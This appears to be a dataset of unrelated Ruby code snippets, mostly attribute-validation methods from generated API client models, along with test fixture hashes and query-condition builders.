"def valid?\n return false if @default_department_id.nil?\n return false if !@default_email.nil? && @default_email.to_s.length > 250\n return false if @default_location_id.nil?\n return false if !@default_phone.nil? && @default_phone.to_s.length > 15\n return false if @expense_approver.nil?\n return false if @first_name.nil?\n return false if @first_name.to_s.length > 30\n return false if !@home_email.nil? && @home_email.to_s.length > 250\n return false if !@home_extension.nil? && @home_extension.to_s.length > 10\n return false if !@home_phone.nil? && @home_phone.to_s.length > 15\n return false if @identifier.nil?\n return false if @identifier.to_s.length > 15\n return false if @last_name.nil?\n return false if @last_name.to_s.length > 30\n return false if @license_class.nil?\n license_class_validator = EnumAttributeValidator.new('String', [\"F\", \"A\", \"C\", \"X\"])\n return false unless license_class_validator.valid?(@license_class)\n return false if !@mobile_email.nil? && @mobile_email.to_s.length > 250\n return false if !@mobile_extension.nil? && @mobile_extension.to_s.length > 10\n return false if !@mobile_phone.nil? && @mobile_phone.to_s.length > 15\n return false if !@office_email.nil? && @office_email.to_s.length > 250\n return false if !@office_extension.nil? && @office_extension.to_s.length > 10\n return false if !@office_phone.nil? && @office_phone.to_s.length > 15\n return false if @sales_default_location_id.nil?\n return false if @time_approver.nil?\n return false if @time_zone.nil?\n return false if !@title.nil? && @title.to_s.length > 50\n return false if @work_role.nil?\n return true\n end",
"def valid_attributes\n hash = @time_record.attributes.reject {|k,v| %w{id user_id pay_period_id created_at updated_at}.include?(k)}\n end",
"def criterion_list searchable_attr = {}, formats ={}, criteria = {}\n\n searchable_attr.each{|attr|\n criterion_key = attr_2_criterion_sym(attr)\n #operator_key = attr_2_operator(attr)\n if params[criterion_key] then\n if not params[criterion_key].blank? then\n if criterion_key.to_s.ends_with?('_date') || criterion_key.to_s.ends_with?('_at') then\n # This is a bit shakey: duck programming at its \"best\" providing you know ath all date attributes must end with \"_date\"\n #criteria[attr] = DateTime.strptime(params[criterion_key], ((formats[criterion_key].nil?)?t($DF + \"default\") : t(formats[criterion_key])))\n criteria[attr] = DateTime.strptime(params[criterion_key], ((formats[criterion_key].nil?)?$DATE_TRANSFER_FORMAT : t(formats[criterion_key])))\n else\n criteria[attr] =params[criterion_key]\n end\n #else\n \n \n end # not blank\n end \n }\n return criteria\n end",
"def has_dates(*attrs)\n options = attrs.extract_options!\n attrs.each do |attr|\n\n attr_reader attr\n define_reader_with_options(attr,options)\n define_method(\"#{attr.to_s}=\") do |val| \n val = val.to_date unless val.nil?\n instance_variable_set(\"@#{attr}\", val )\n attributes[attr] = val\n val\n\n end\n end\n end",
"def valid?\n return false if @address1.nil?\n return false if @address1.to_s.length > 100\n return false if @address1.to_s.length < 1\n return false if !@address2.nil? && @address2.to_s.length > 100\n return false if @amount.nil?\n return false if @amount > 10000000\n return false if @amount < 1\n return false if !@business_description.nil? && @business_description.to_s.length > 500\n business_type_validator = EnumAttributeValidator.new('String', [\"corporate\", \"individual\"])\n return false unless business_type_validator.valid?(@business_type)\n return false if !@corporate_number.nil? && @corporate_number !~ Regexp.new(/^\\\\d{13}$/)\n return false if @email.nil?\n return false if @end_date.nil?\n return false if @prefecture.nil?\n prefecture_validator = EnumAttributeValidator.new('String', [\"北海道\", \"青森県\", \"岩手県\", \"宮城県\", \"秋田県\", \"山形県\", \"福島県\", \"茨城県\", \"栃木県\", \"群馬県\", \"埼玉県\", \"千葉県\", \"東京都\", \"神奈川県\", \"新潟県\", \"富山県\", \"石川県\", \"福井県\", \"山梨県\", \"長野県\", \"岐阜県\", \"静岡県\", \"愛知県\", \"三重県\", \"滋賀県\", \"京都府\", \"大阪府\", \"兵庫県\", \"奈良県\", \"和歌山県\", \"鳥取県\", \"島根県\", \"岡山県\", \"広島県\", \"山口県\", \"徳島県\", \"香川県\", \"愛媛県\", \"高知県\", \"福岡県\", \"佐賀県\", \"長崎県\", \"熊本県\", \"大分県\", \"宮崎県\", \"鹿児島県\", \"沖縄県\"])\n return false unless prefecture_validator.valid?(@prefecture)\n return false if !@remark.nil? && @remark.to_s.length > 500\n return false if !@representative_name.nil? && @representative_name.to_s.length > 30\n return false if @tel.nil?\n return false if @tel !~ Regexp.new(/^0((\\\\d{1,2}-?\\\\d{1,4}|\\\\d{3,4}-?\\\\d{1,2})-?\\\\d{4}|120-?\\\\d{3}-?\\\\d{3})$/)\n return false if !@url.nil? && @url.to_s.length > 500\n return false if @zip_code.nil?\n return false if @zip_code !~ Regexp.new(/^\\\\d{3}-?\\\\d{4}$/)\n return true\n end",
"def valid?\n return false if @name.nil?\n return false if @name.to_s.length > 50\n return false if @prefix_suffix_option.nil?\n prefix_suffix_option_validator = EnumAttributeValidator.new('String', [\"Prefix\", \"Suffix\"])\n return false unless prefix_suffix_option_validator.valid?(@prefix_suffix_option)\n return false if !@invoice_pre_suffix.nil? && @invoice_pre_suffix.to_s.length > 5\n application_units_validator = EnumAttributeValidator.new('String', [\"Amount\", \"Hours\", \"Incidents\"])\n return false unless application_units_validator.valid?(@application_units)\n application_cycle_validator = EnumAttributeValidator.new('String', [\"Contract2Weeks\", \"Contract4Weeks\", \"ContractYear\", \"CalendarMonth\", \"CalendarQuarter\", \"CalendarWeek\", \"ContractQuarter\", \"CalendarYear\"])\n return false unless application_cycle_validator.valid?(@application_cycle)\n return false if @employee_comp_rate.nil?\n employee_comp_rate_validator = EnumAttributeValidator.new('String', [\"Actual\", \"Hourly\"])\n return false unless employee_comp_rate_validator.valid?(@employee_comp_rate)\n return false if @employee_comp_not_exceed.nil?\n employee_comp_not_exceed_validator = EnumAttributeValidator.new('String', [\"Billing\", \"Percent\", \"Amount\"])\n return false unless employee_comp_not_exceed_validator.valid?(@employee_comp_not_exceed)\n return false if @invoicing_cycle.nil?\n invoicing_cycle_validator = EnumAttributeValidator.new('String', [\"CalendarYear\", \"ContractYear\"])\n return false unless invoicing_cycle_validator.valid?(@invoicing_cycle)\n return false if !@invoice_description.nil? && @invoice_description.to_s.length > 4000\n return false if @bill_time.nil?\n bill_time_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_time_validator.valid?(@bill_time)\n return false if @bill_expenses.nil?\n bill_expenses_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_expenses_validator.valid?(@bill_expenses)\n return false if @bill_products.nil?\n bill_products_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_products_validator.valid?(@bill_products)\n return true\n end",
"def valid?\n return false if @remit_name.nil?\n return false if @remit_name.to_s.length > 50\n return false if @location.nil?\n return false if !@address_one.nil? && @address_one.to_s.length > 50\n return false if !@address_two.nil? && @address_two.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@phone.nil? && @phone.to_s.length > 15\n return false if @invoice_title.nil?\n return false if @invoice_title.to_s.length > 50\n return false if @payable_name.nil?\n return false if @payable_name.to_s.length > 50\n return false if !@topcomment.nil? && @topcomment.to_s.length > 4000\n return false if !@invoice_footer.nil? && @invoice_footer.to_s.length > 500\n return false if !@quote_footer.nil? && @quote_footer.to_s.length > 1000\n return false if @overall_invoice_default.nil?\n prefix_suffix_flag_validator = EnumAttributeValidator.new('String', [\"Prefix\", \"Suffix\"])\n return false unless prefix_suffix_flag_validator.valid?(@prefix_suffix_flag)\n return false if !@prefix_suffix_text.nil? && @prefix_suffix_text.to_s.length > 5\n return false if @email_template.nil?\n return false if !@business_number.nil? && @business_number.to_s.length > 50\n return false if !@custom_label.nil? && @custom_label.to_s.length > 50\n return false if !@custom_text.nil? && @custom_text.to_s.length > 500\n return false if !@company_code.nil? && @company_code.to_s.length > 250\n return true\n end",
"def valid?\n return false if @employee_id.nil?\n return false if @leave_type_id.nil?\n return false if @start_date.nil?\n return false if @end_date.nil?\n return false if @work_pattern.nil?\n return false if @is_pregnancy_related.nil?\n return false if @sufficient_notice.nil?\n true\n end",
"def valid?\n return false if @date.nil?\n return false if @campaign_revenue.nil?\n return false if @total_campaign_revenue.nil?\n return false if @campaign_refund.nil?\n return false if @total_campaign_refund.nil?\n return false if @campaign_discount_costs.nil?\n return false if @total_campaign_discount_costs.nil?\n return false if @campaign_refunded_discounts.nil?\n return false if @total_campaign_refunded_discounts.nil?\n return false if @campaign_free_items.nil?\n return false if @total_campaign_free_items.nil?\n return false if @coupon_redemptions.nil?\n return false if @total_coupon_redemptions.nil?\n return false if @coupon_rolledback_redemptions.nil?\n return false if @total_coupon_rolledback_redemptions.nil?\n return false if @referral_redemptions.nil?\n return false if @total_referral_redemptions.nil?\n return false if @coupons_created.nil?\n return false if @total_coupons_created.nil?\n return false if @referrals_created.nil?\n return false if @total_referrals_created.nil?\n return false if @added_loyalty_points.nil?\n return false if @total_added_loyalty_points.nil?\n return false if @deducted_loyalty_points.nil?\n return false if @total_deducted_loyalty_points.nil?\n true\n end",
"def valid_attributes\r\n {\r\n :item_id => 2,\r\n :seller_id => 1,\r\n :bid_amount => 100,\r\n :highest_bidder => 2,\r\n :state => 1,\r\n :end_time => Time.now\r\n }\r\n end",
"def valid?\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n if @metadata.nil?\n return false\n end\n\n \n \n \n \n \n \n \n \n end",
"def check_required_attributes\n attributes = DSL.attributes.values.select(&:required?)\n attributes.each do |attr|\n value = spec.send(attr.name)\n unless value && (!value.respond_to?(:empty?) || !value.empty?)\n if attr.name == :license\n results.add_warning('attributes', 'Missing required attribute ' \\\n \"`#{attr.name}`.\")\n else\n results.add_error('attributes', 'Missing required attribute ' \\\n \"`#{attr.name}`.\")\n end\n end\n end\n end",
"def validate_mandatory_fields\n validate_for_card unless self.cc_number.blank?\n validate_for_transaction_tag unless self.transaction_tag.blank?\n validate_for_track1 unless self.track1.blank?\n validate_for_track2 unless self.track2.blank?\n end",
"def valid?\n return false if @identifier.nil?\n return false if @identifier.to_s.length > 15\n return false if !@password.nil? && @password.to_s.length > 60\n return false if @first_name.nil?\n return false if @first_name.to_s.length > 30\n return false if @last_name.nil?\n return false if @last_name.to_s.length > 30\n return false if !@title.nil? && @title.to_s.length > 50\n return false if @license_class.nil?\n license_class_validator = EnumAttributeValidator.new('String', [\"F\", \"A\", \"C\", \"X\"])\n return false unless license_class_validator.valid?(@license_class)\n return false if !@employee_identifer.nil? && @employee_identifer.to_s.length > 10\n return false if @time_zone.nil?\n return false if !@office_email.nil? && @office_email.to_s.length > 250\n return false if !@office_phone.nil? && @office_phone.to_s.length > 15\n return false if !@office_extension.nil? && @office_extension.to_s.length > 10\n return false if !@mobile_email.nil? && @mobile_email.to_s.length > 250\n return false if !@mobile_phone.nil? && @mobile_phone.to_s.length > 15\n return false if !@mobile_extension.nil? && @mobile_extension.to_s.length > 10\n return false if !@home_email.nil? && @home_email.to_s.length > 250\n return false if !@home_phone.nil? && @home_phone.to_s.length > 15\n return false if !@home_extension.nil? && @home_extension.to_s.length > 10\n return false if @default_email.nil?\n default_email_validator = EnumAttributeValidator.new('String', [\"Office\", \"Mobile\", \"Home\"])\n return false unless default_email_validator.valid?(@default_email)\n return false if @default_phone.nil?\n default_phone_validator = EnumAttributeValidator.new('String', [\"Office\", \"Mobile\", \"Home\"])\n return false unless default_phone_validator.valid?(@default_phone)\n return false if @security_role.nil?\n return false if @structure_level.nil?\n return false if @security_location.nil?\n return false if @default_location.nil?\n return false if @default_department.nil?\n return false if @work_role.nil?\n return false if @time_approver.nil?\n return false if @expense_approver.nil?\n return false if @hire_date.nil?\n return false if @sales_default_location.nil?\n return false if !@ldap_user_name.nil? 
&& @ldap_user_name.to_s.length > 50\n return false if @company_activity_tab_format.nil?\n company_activity_tab_format_validator = EnumAttributeValidator.new('String', [\"SummaryList\", \"DetailList\"])\n return false unless company_activity_tab_format_validator.valid?(@company_activity_tab_format)\n return false if @invoice_time_tab_format.nil?\n invoice_time_tab_format_validator = EnumAttributeValidator.new('String', [\"SummaryList\", \"DetailList\"])\n return false unless invoice_time_tab_format_validator.valid?(@invoice_time_tab_format)\n return false if @invoice_screen_default_tab_format.nil?\n invoice_screen_default_tab_format_validator = EnumAttributeValidator.new('String', [\"ShowInvoicingTab\", \"ShowAgreementInvoicingTab\"])\n return false unless invoice_screen_default_tab_format_validator.valid?(@invoice_screen_default_tab_format)\n return false if @invoicing_display_options.nil?\n invoicing_display_options_validator = EnumAttributeValidator.new('String', [\"RemainOnInvoicingScreen\", \"ShowRecentInvoices\"])\n return false unless invoicing_display_options_validator.valid?(@invoicing_display_options)\n return false if @agreement_invoicing_display_options.nil?\n agreement_invoicing_display_options_validator = EnumAttributeValidator.new('String', [\"RemainOnInvoicingScreen\", \"ShowRecentInvoices\"])\n return false unless agreement_invoicing_display_options_validator.valid?(@agreement_invoicing_display_options)\n return false if !@corelytics_username.nil? && @corelytics_username.to_s.length > 50\n return false if !@corelytics_password.nil? && @corelytics_password.to_s.length > 50\n remote_package_validator = EnumAttributeValidator.new('String', [\"LogMeIn\", \"NTR\"])\n return false unless remote_package_validator.valid?(@remote_package)\n return false if !@remote_package_platform.nil? && @remote_package_platform.to_s.length > 250\n return false if !@remote_package_user_name.nil? && @remote_package_user_name.to_s.length > 50\n return false if !@remote_package_password.nil? && @remote_package_password.to_s.length > 50\n return false if !@remote_package_account.nil? && @remote_package_account.to_s.length > 250\n authentication_service_type_validator = EnumAttributeValidator.new('String', [\"AuthAnvil\", \"GoogleAuthenticator\"])\n return false unless authentication_service_type_validator.valid?(@authentication_service_type)\n return true\n end",
"def valid_attributes\n { \"room_id\" => \"1\", \"check_in_time\" => DateTime.now, \"user_id\" => user.id }\n end",
"def valid?\n return false if @ach_type.nil?\n return false if @routing_number.nil?\n return false if @routing_number.to_s.length > 9\n return false if @routing_number.to_s.length < 9\n return false if @routing_number !~ Regexp.new(/^[0-9]+$/)\n return false if @account_number.nil?\n return false if @account_number.to_s.length > 56\n return false if @account_number.to_s.length < 1\n return false if @account_number !~ Regexp.new(/^[0-9]+$/)\n return false if @account_type.nil?\n account_type_validator = EnumAttributeValidator.new('String', [\"C\", \"S\"])\n return false unless account_type_validator.valid?(@account_type)\n return false if !@check_number.nil? && @check_number.to_s.length > 10\n return false if !@check_number.nil? && @check_number !~ Regexp.new(/^[0-9]+$/)\n return false if @check_type.nil?\n check_type_validator = EnumAttributeValidator.new('String', [\"P\", \"C\"])\n return false unless check_type_validator.valid?(@check_type)\n return false if !@product_code.nil? && @product_code.to_s.length > 6\n return false if !@product_code.nil? && @product_code !~ Regexp.new(/^[0-9]+$/)\n return false if !@agent_id.nil? && @agent_id.to_s.length > 6\n return false if !@agent_id.nil? && @agent_id !~ Regexp.new(/(?=.*[^\\s])^[^|]+$/)\n return false if !@terminal_id.nil? && @terminal_id.to_s.length > 10\n return false if !@terminal_id.nil? && @terminal_id !~ Regexp.new(/^[0-9]+$/)\n return false if !@registration_id.nil? && @registration_id.to_s.length > 50\n return false if !@registration_id.nil? && @registration_id !~ Regexp.new(/(?=.*[^\\s])^[^|]+$/)\n release_type_validator = EnumAttributeValidator.new('String', [\"C\", \"D\", \"P\", \"T\"])\n return false unless release_type_validator.valid?(@release_type)\n vip_customer_validator = EnumAttributeValidator.new('String', [\"Y\", \"N\"])\n return false unless vip_customer_validator.valid?(@vip_customer)\n return false if @session_id.nil?\n return false if @session_id.to_s.length > 128\n return false if @session_id !~ Regexp.new(/(?=.*[^\\s])^[^|]+$/)\n return false if !@terminal_state.nil? && @terminal_state.to_s.length > 2\n return false if !@terminal_state.nil? && @terminal_state !~ Regexp.new(/^[A-Z]{2}$/)\n return false if !@terminal_city.nil? && @terminal_city.to_s.length > 16\n return false if !@terminal_city.nil? && @terminal_city !~ Regexp.new(/(?=.*[^\\s])^[^|]+$/)\n true\n end",
"def build_conditions(conditions)\n conditions = [\"1=1\"] if conditions.blank?\n unless self.claim_id.blank?\n conditions[0] += \" and id = ?\"\n conditions << self.claim_id\n end\n unless self.organisation_id.blank?\n conditions[0] += \" and organisation_id = ?\"\n conditions << self.organisation_id\n end\n unless self.date_service_start.blank?\n conditions[0] += \" and date_service >= ?\"\n conditions << self.date_service_start\n end\n unless self.date_service_end.blank?\n conditions[0] += \" and date_service <= ?\"\n conditions << self.date_service_end\n end\n unless self.invoice_date_start.blank?\n conditions[0] += \" and invoice_date >= ?\"\n conditions << self.invoice_date_start\n end\n unless self.invoice_date_end.blank?\n conditions[0] += \" and invoice_date <= ?\"\n conditions << self.invoice_date_end\n end\n unless self.programme_id.blank?\n conditions[0] += \" and programme_id = ?\"\n conditions << self.programme_id\n end\n unless self.fee_schedule_id.blank?\n conditions[0] += \" and fee_schedule_id = ?\"\n conditions << self.fee_schedule_id\n end\n unless self.claim_status_id.blank?\n conditions[0] += \" and claim_status_id = ?\"\n conditions << self.claim_status_id\n end\n unless self.invoice_no.blank?\n conditions[0] += \" and invoice_no = ?\"\n conditions << self.invoice_no\n end\n if self.zero_value == 1 \n conditions[0] += \" and amount = 0\"\n end\n conditions\n end",
"def valid_attributes\n {\n :user_id=> 1 ,\n :credit_card_no =>\"1234567812345678\",\n :billing_address =>\"MyText\" ,\n :zipcode =>12345\n }\n end",
"def core_attributes_valid\n core_attributes = [@rateable, @rater, @ratee, @rating_type]\n return if core_attributes.all? { |atr| atr.present? && atr.valid? }\n errors.add('message', 'Not all core attributes present and valid.')\n end",
"def valid_attributes\n {\n first_name: \"Robin\",\n last_name: \"Dunlop\",\n gender: \"Male\",\n user_id: @user.id,\n birthday: Date.new(1982, 01, 19),\n contact_detail_attributes: {\n address: \"123 Fake Street\",\n city: \"Madison\",\n state: \"WI\",\n country_residence: \"US\",\n zip: \"12345\",\n club: \"TCUC\",\n club_contact: \"Connie\",\n usa_member_number: \"12345\",\n volunteer: false,\n emergency_name: \"Caitlin\",\n emergency_relationship: \"Sig. Oth.\",\n emergency_attending: true,\n emergency_primary_phone: \"306-222-1212\",\n emergency_other_phone: \"911\",\n responsible_adult_name: \"Andy\",\n responsible_adult_phone: \"312-555-5555\"\n }\n }\n end",
"def check_if_approval_is_required\n check_by_families || check_by_supplier || check_by_project ||\n check_by_office || check_by_company || check_by_zone\n end",
"def atributos\n valid = false\n if self.interreps_vencidos.any?\n valid = true\n\n elsif presente_reunioes == true\n valid = true\n end\n\n # elsif Time.now.year - ano_de_fundacao <= 1 \n # valid = true\n # end\n\n valid\n end",
"def set_derived_fields\n self.credit_for_mil_training = to_yes_string(vet2)\n self.vet_poc = to_yes_string(vet3)\n self.student_vet_grp_ipeds = to_yes_string(vet4)\n self.soc_member = to_yes_string(vet5)\n self.calendar = to_calendar(calsys)\n self.online_all = to_true_string(distnced)\n\n true\n end",
"def usable?\n codes.present? && (start_time.present? || end_time.present? || time.present?)\n end",
"def validations\n valid_page_number? if page_number\n valid_period_name? if period_param\n valid_date? if date_param\n end",
"def validate_payer_and_its_related_attributes\r\n result = true\r\n error_message = nil\r\n if !params[:payer].blank?\r\n payer_address_fields = {\r\n :address_one => params[:payer][:pay_address_one].to_s.strip,\r\n :city => params[:payer][:payer_city].to_s.strip,\r\n :state => params[:payer][:payer_state].to_s.strip,\r\n :zip_code => params[:payer][:payer_zip].to_s.strip\r\n }\r\n end\r\n if !params[:micr_line_information].blank?\r\n routing_number = params[:micr_line_information][:aba_routing_number]\r\n account_number = params[:micr_line_information][:payer_account_number]\r\n end\r\n \r\n result, error_message = validate_payer_address(payer_address_fields)\r\n logger.debug \"validate_payer_address result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = @payer.validate_payer_id(params[:payer][:payid])\r\n logger.debug \"validate_payer_id result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = @payer.validate_against_payer_duplication(params[:payer],\r\n params[:id], params[:micr_line_information])\r\n if !error_message.blank?\r\n @do_not_save_micr = true\r\n end\r\n logger.debug \"validate_against_payer_duplication result : #{result}\"\r\n message = error_message if result\r\n return result, error_message if not result\r\n \r\n result, error_message = @payer.validate_unique_payer_for_micr(routing_number, account_number)\r\n logger.debug \"validate_unique_payer_for_micr result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = @payer.validate_presence_of_eobs_when_payer_type_changes(params[:payer][:payer_type])\r\n logger.debug \"validate_presence_of_eobs_when_payer_type_changes result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = validate_client_id(params[:facilities_micr_information],\r\n params[:serial_numbers_for_adding_onbase_name])\r\n logger.debug \"validate_client_id for Onbase Name result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = validate_client_id(params[:facilities_payers_information],\r\n params[:serial_numbers_for_adding_output_payid])\r\n logger.debug \"validate_client_id for Output Payid result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = validate_footnote_indicator_for_assigning_set_name\r\n logger.debug \"validate_footnote_indicator_for_assigning_set_name result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = validate_payment_and_allowance_and_capitation_codes\r\n logger.debug \"validate_payment_and_allowance_and_capitation_codes result : #{result}\"\r\n return result, error_message if not result\r\n \r\n error_message = message.to_s + error_message.to_s\r\n return result, error_message\r\n end",
"def registration_dates_given?\n if registration_start_date.blank? || registration_end_date.blank?\n false\n else\n true\n end\n end",
"def valid_attributes\n { :val_1 => 1.1,\n :val_2 => 2.2,\n :val_3 => 3.3,\n :val_4 => 4.4,\n :notes => \"hi\"\n }\n end",
"def valid?\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n if @total_servicos.nil?\n return false\n end\n\n \n \n \n \n \n if @total_parcelado_nacionais.nil?\n return false\n end\n\n \n \n \n \n \n if @total_parcelado_internacionais.nil?\n return false\n end\n\n \n \n \n \n end",
"def valid?\n \n if @account_id.nil?\n false\n elsif @campaign_id.nil?\n false\n elsif @csp_id.nil?\n false\n elsif @status.nil?\n false\n elsif @create_date.nil?\n false\n elsif @auto_renewal.nil?\n false\n elsif @brand_id.nil?\n false\n elsif @usecase.nil?\n false\n elsif @sub_usecases.nil?\n false\n elsif @description.nil?\n false\n elsif @embedded_link.nil?\n false\n elsif @embedded_phone.nil?\n false\n elsif @affiliate_marketing.nil?\n false\n elsif @number_pool.nil?\n false\n elsif @age_gated.nil?\n false\n elsif @direct_lending.nil?\n false\n elsif @subscriber_optin.nil?\n false\n elsif @subscriber_optout.nil?\n false\n elsif @subscriber_help.nil?\n false\n elsif @sample1.nil?\n false\n elsif @mock.nil?\n false\n else\n list_invalid_properties.length() == 0\n end\n end",
"def valid?\n return false if @name.nil?\n return false if @value.nil?\n return false if @timestamp.nil?\n return false if @source_id.nil?\n return false if @source_label.nil?\n return false if @source.nil?\n source_validator = EnumAttributeValidator.new('String', [\"IMPORT\", \"API\", \"FORM\", \"ANALYTICS\", \"MIGRATION\", \"SALESFORCE\", \"INTEGRATION\", \"CONTACTS_WEB\", \"WAL_INCREMENTAL\", \"TASK\", \"EMAIL\", \"WORKFLOWS\", \"CALCULATED\", \"SOCIAL\", \"BATCH_UPDATE\", \"SIGNALS\", \"BIDEN\", \"DEFAULT\", \"COMPANIES\", \"DEALS\", \"ASSISTS\", \"PRESENTATIONS\", \"TALLY\", \"SIDEKICK\", \"CRM_UI\", \"MERGE_CONTACTS\", \"PORTAL_USER_ASSOCIATOR\", \"INTEGRATIONS_PLATFORM\", \"BCC_TO_CRM\", \"FORWARD_TO_CRM\", \"ENGAGEMENTS\", \"SALES\", \"HEISENBERG\", \"LEADIN\", \"GMAIL_INTEGRATION\", \"ACADEMY\", \"SALES_MESSAGES\", \"AVATARS_SERVICE\", \"MERGE_COMPANIES\", \"SEQUENCES\", \"COMPANY_FAMILIES\", \"MOBILE_IOS\", \"MOBILE_ANDROID\", \"CONTACTS\", \"ASSOCIATIONS\", \"EXTENSION\", \"SUCCESS\", \"BOT\", \"INTEGRATIONS_SYNC\", \"AUTOMATION_PLATFORM\", \"CONVERSATIONS\", \"EMAIL_INTEGRATION\", \"CONTENT_MEMBERSHIP\", \"QUOTES\", \"BET_ASSIGNMENT\", \"QUOTAS\", \"BET_CRM_CONNECTOR\", \"MEETINGS\", \"MERGE_OBJECTS\", \"RECYCLING_BIN\", \"ADS\", \"AI_GROUP\", \"COMMUNICATOR\", \"SETTINGS\", \"PROPERTY_SETTINGS\", \"PIPELINE_SETTINGS\", \"COMPANY_INSIGHTS\", \"BEHAVIORAL_EVENTS\", \"PAYMENTS\", \"GOALS\", \"PORTAL_OBJECT_SYNC\", \"APPROVALS\", \"FILE_MANAGER\", \"MARKETPLACE\", \"INTERNAL_PROCESSING\", \"FORECASTING\", \"SLACK_INTEGRATION\", \"CRM_UI_BULK_ACTION\", \"WORKFLOW_CONTACT_DELETE_ACTION\"])\n return false unless source_validator.valid?(@source)\n return false if @selected_by_user.nil?\n return false if @selected_by_user_timestamp.nil?\n return false if @source_vid.nil?\n return false if @source_metadata.nil?\n return false if @request_id.nil?\n true\n end",
"def validate\n carrier_fk = carrier_id if carrier_fk.nil?\n if id.nil?\n date_array = FeeSchedule.find(:all,:conditions=>[\"carrier_id =? and practice_id = ? \",carrier_fk,practice_id]).collect{|x|[x.start_date,x.end_date]} if carrier_fk != 0\n else\n date_array = FeeSchedule.find(:all,:conditions=>[\"carrier_id =? and practice_id = ? and id != ? \",carrier_fk,practice_id,id]).collect{|x|[x.start_date,x.end_date]} if carrier_fk != 0\n end\n start_error = \"\"\n if !date_array.nil?\n for start_d,end_d in date_array\n unless start_date.nil?\n if start_date.to_date >= start_d.to_date and start_date.to_date <= end_d.to_date\n start_error =\"error\"\n end\n end \n unless end_date.nil?\n if end_date.to_date >= start_d.to_date and end_date.to_date <= end_d.to_date\n start_error =\"error\"\n end\n end \n end\n end\n errors.add(\"Selected Date Range already Exists for the Carrier. selected date range for the carrier\") unless start_error.empty?\n unless start_date.nil?\n unless end_date.nil?\n errors.add(\"End date should be greater than start date, End Date \") unless end_date.to_date > start_date.to_date\n end\n end\n if charge_type == 'Standard'\n if id.nil?\n dat_array_charge_type = FeeSchedule.find(:all,:conditions=>[\"charge_type =? and practice_id = ? \",\"Standard\",practice_id]).collect{|x|[x.start_date,x.end_date]}\n else\n dat_array_charge_type = FeeSchedule.find(:all,:conditions=>[\"charge_type =? and practice_id = ? and id != ?\",\"Standard\",practice_id,id]).collect{|x|[x.start_date,x.end_date]}\n end\n start_error_charge_type = \"\"\n for start_d_charge_type,end_d_charge_type in dat_array_charge_type\n unless start_date.nil?\n if start_date.to_date >= start_d_charge_type.to_date and start_date.to_date <= end_d_charge_type.to_date\n start_error_charge_type =\"error\"\n end\n end\n unless end_date.nil?\n if end_date.to_date >= start_d_charge_type.to_date and end_date.to_date <= end_d_charge_type.to_date\n start_error_charge_type =\"error\"\n end\n end \n end \n errors.add(\"Selected Date Range already Exists for the Practice. selected Date range for the Practice\") unless start_error_charge_type.empty? \n end\n end",
"def valid_points_record_attributes?(attibutes)\n attibutes[:course_user_id].present? &&\n attibutes[:points_awarded].present? &&\n attibutes[:points_awarded].to_i >= 1\n end",
"def blank_date_parameter?\n (1..3).any? { |position| values[position].blank? }\n end",
"def add_on_minimal_charge? invoice_period_end\n minimal_charge_enabled? and minimal_charge_start_at and minimal_charge_start_at < invoice_period_end #Time.parse('2001-01-01 00:00:00') < invoice_period_end#Date.parse(minimal_charge_start_at) < invoice_period_end\n end",
"def valid?\n @errors = []\n @errors << 'you must give a new walltime' if walltime.blank?\n @errors << 'new walltime must be a String' if !walltime.blank? && !walltime.is_a?(String)\n @errors << 'timeout must be an Integer' if !timeout.blank? && !timeout.is_a?(Integer)\n\n # We support Booleans for YES_NO_ATTRIBUTES and also Strings with 'yes/no',\n # however only Booleans is documented.\n # OAR's Rest API needs 'yes/no' Strings, we transform the Booleans to\n # 'yes/no' Strings.\n YES_NO_ATTRIBUTES.each do |attribute|\n value = instance_variable_get \"@#{attribute}\"\n if !value.nil?\n if !([TrueClass, FalseClass].include?(value.class) ||\n (value.is_a?(String) && ['yes', 'no'].include?(value)))\n @errors << \"#{YES_NO_ATTRIBUTES.join(', ')} must be a Boolean\"\n break\n else\n case value\n when TrueClass\n instance_variable_set \"@#{attribute}\", 'yes'\n when FalseClass\n instance_variable_set \"@#{attribute}\", 'no'\n else\n end\n end\n end\n end\n\n @errors.empty?\n end",
"def checkAttributeRequirements\n if @valid_attributes.empty?\n @error_text = \"No valid attributes found\"\n return false\n elsif (@mandatory_attributes_from_db & @valid_attributes) != @mandatory_attributes_from_db\n missing_attr = @mandatory_attributes_from_db - (@mandatory_attributes_from_db & @valid_attributes)\n\n x_attr_txt = \"\"\n missing_attr.each {|x_attr| x_attr_txt += x_attr[:name] + \", \"}\n @error_text = \"Mandatory attributes #{x_attr_txt[0..-3]} is/are missing\"\n return false\n end\n\n return true\n end",
"def model_attributes\n return if model_date.blank?\n\n DATE_PARTS.each_with_object({}) { |part, hash| hash[parts_hash[part]] = model_date.__send__(part) }\n end",
